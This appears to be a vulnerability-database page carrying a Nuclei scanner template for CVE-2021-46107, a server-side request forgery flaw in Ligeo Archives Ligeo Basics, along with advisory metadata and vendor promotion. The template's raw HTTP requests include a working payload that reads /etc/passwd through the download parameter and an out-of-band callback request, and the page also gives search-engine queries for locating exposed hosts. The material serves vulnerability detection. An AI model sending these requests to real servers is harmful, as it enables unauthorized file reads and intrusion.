| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2021-46107 | 17 Mar 202221:15 | – | attackerkb | |
| CVE-2021-46107 | 17 Mar 202223:26 | – | circl | |
| Ligeo Archives 代码问题漏洞 | 17 Mar 202200:00 | – | cnnvd | |
| CVE-2021-46107 | 17 Mar 202220:33 | – | cve | |
| CVE-2021-46107 | 17 Mar 202220:33 | – | cvelist | |
| CVE-2021-46107 | 17 Mar 202221:15 | – | nvd | |
| CVE-2021-46107 | 17 Mar 202221:15 | – | osv | |
| Server side request forgery (ssrf) | 17 Mar 202221:15 | – | prion |
id: CVE-2021-46107
info:
name: Ligeo Archives Ligeo Basics - Server Side Request Forgery
author: ritikchaddha
severity: high
description: |
Ligeo Archives Ligeo Basics as of 02_01-2022 is vulnerable to Server Side Request Forgery (SSRF) which allows an attacker to read any documents via the download features.
impact: |
The impact of this vulnerability is significant as it can result in unauthorized access to sensitive data or systems.
remediation: |
Apply the latest security patches or updates provided by the vendor to fix the Server Side Request Forgery vulnerability.
reference:
- https://raw.githubusercontent.com/Orange-Cyberdefense/CVE-repository/master/PoCs/POC_CVE-2021-46107.py
- https://nvd.nist.gov/vuln/detail/CVE-2021-46107
- https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/
- https://github.com/Transmetal/CVE-repository-master
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-46107
cwe-id: CWE-918
epss-score: 0.07408
epss-percentile: 0.93696
cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: ligeo-archives
product: ligeo_basics
shodan-query:
- title:"Ligeo"
- http.title:"ligeo"
fofa-query:
- title="Ligeo"
- title="ligeo"
google-query: intitle:"ligeo"
tags: cve2021,cve,ligeo,ssrf,lfr,ligeo-archives,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /archive/download?file=file:///etc/passwd HTTP/1.1
Host: {{Hostname}}
- |
GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')"
- "contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"
# digest: 4a0a00473045022100e11817f62344c2d96c2cb17aa84eb43e101b9d44b3545e235860eba6bad3d52b02200b820d32c6dec5537307aa12d97f9d039a9be7733292010ffde5208f89797947:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation